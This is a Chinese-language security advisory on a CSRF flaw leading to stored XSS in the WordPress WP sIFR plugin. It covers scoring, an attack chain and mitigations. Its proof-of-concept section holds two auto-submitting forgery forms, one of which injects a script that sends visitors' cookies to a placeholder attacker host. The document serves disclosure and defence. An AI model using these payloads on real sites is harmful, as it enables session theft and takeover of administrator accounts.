CVE-2025-49347: WordPress WP sIFR插件CSRF漏洞导致存储型XSS

漏洞信息

漏洞编号

CVE-2025-49347

漏洞类型

CSRF/存储型XSS

CVSS评分

7.1 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

WP sIFR (WordPress Plugin by Jupitercow)

漏洞概述

CVE-2025-49347是WordPress WP sIFR插件中的一个跨站请求伪造（CSRF）漏洞，该漏洞可导致存储型跨站脚本（Stored XSS）攻击。WP sIFR插件是一款用于在WordPress网站中实现Flash字体渲染的插件，由Jupitercow开发。该漏洞影响版本从n/a至0.6.8.1。攻击者可以利用CSRF漏洞诱骗已认证的管理员用户访问恶意构造的网页，在管理员不知情的情况下执行未授权的操作，如向插件设置中注入恶意JavaScript代码。由于这些恶意脚本会被存储在数据库中，当其他用户访问相关页面时，恶意代码会自动执行，从而窃取会话Cookie、劫持用户账户或进行其他恶意操作。该漏洞CVSS评分为7.1（高危），攻击向量为网络，攻击复杂度低，无需认证即可发起攻击，但需要用户交互（管理员点击恶意链接）。

技术细节

该漏洞的根本原因在于WP sIFR插件的某些管理功能缺少CSRF令牌验证机制。攻击者可以构造恶意HTML表单或链接，诱使已登录的管理员用户提交请求。在WordPress中，管理员操作通常需要认证，但CSRF攻击利用了这一信任关系：当管理员访问攻击者控制的页面时，浏览器会自动携带该域名的Cookie发送请求。攻击者通过在插件的输入字段中注入恶意JavaScript代码（如<script>标签或事件处理器），由于插件未对用户输入进行充分的输出转义，这些恶意代码会被永久存储在数据库中。当其他用户访问包含这些数据的页面时，恶意脚本会以该站点的上下文执行，从而实现存储型XSS攻击。攻击者可以利用此漏洞窃取管理员的认证凭据、修改站点内容或安装恶意插件。CVSS向量显示其影响范围为已更改（S:C），对机密性、完整性和可用性均有低程度影响。

攻击链分析

STEP 1

步骤1

攻击者侦察目标站点，识别其使用的WordPress版本和WP sIFR插件版本（<= 0.6.8.1）

STEP 2

步骤2

攻击者构造包含恶意HTML表单的网页，该表单会自动向WP sIFR插件的漏洞端点发送POST请求，注入存储型XSS payload

STEP 3

步骤3

攻击者通过钓鱼邮件、社交工程或其他方式诱骗WordPress管理员访问恶意网页

STEP 4

步骤4

管理员浏览器自动发送携带有效认证Cookie的请求，恶意代码被写入数据库

STEP 5

步骤5

当其他用户访问包含恶意数据的页面时，存储型XSS执行，攻击者可窃取Cookie、劫持会话或进行进一步攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CSRF PoC for CVE-2025-49347: WP sIFR Stored XSS -->
<html>
  <body>
    <form action="http://target-wordpress/wp-admin/admin.php?page=wp-sifr-settings" method="POST" id="csrf-form">
      <input type="hidden" name="sifr_option" value="<script>alert(document.cookie)</script>">
      <input type="hidden" name="sifr_submit" value="Save Changes">
      <input type="hidden" name="_wpnonce" value="">
    </form>
    <script>
      // Auto-submit form when page loads
      document.getElementById('csrf-form').submit();
    </script>
    <p>CSRF PoC - If plugin is vulnerable, XSS will be stored.</p>
  </body>
</html>

<!-- Alternative: Stored XSS via sIFR content injection -->
<html>
  <body>
    <form action="http://target-wordpress/wp-admin/admin.php?page=wp-sifr" method="POST">
      <input type="hidden" name="sifr_text" value="<img src=x onerror='fetch(\"https://attacker.com/steal?c=\"+document.cookie)'>">
      <input type="hidden" name="action" value="save">
    </form>
    <script>document.forms[0].submit();</script>
  </body>
</html>

影响范围

WP sIFR <= 0.6.8.1

防御指南

临时缓解措施

在官方补丁发布之前，可以通过以下方式临时缓解：1) 临时禁用WP sIFR插件；2) 使用WordPress安全插件（如Wordfence）添加CSRF保护规则；3) 加强对管理员账户的安全措施，如使用双因素认证；4) 监控管理员操作日志以检测异常行为；5) 限制管理员访问插件设置页面的IP范围。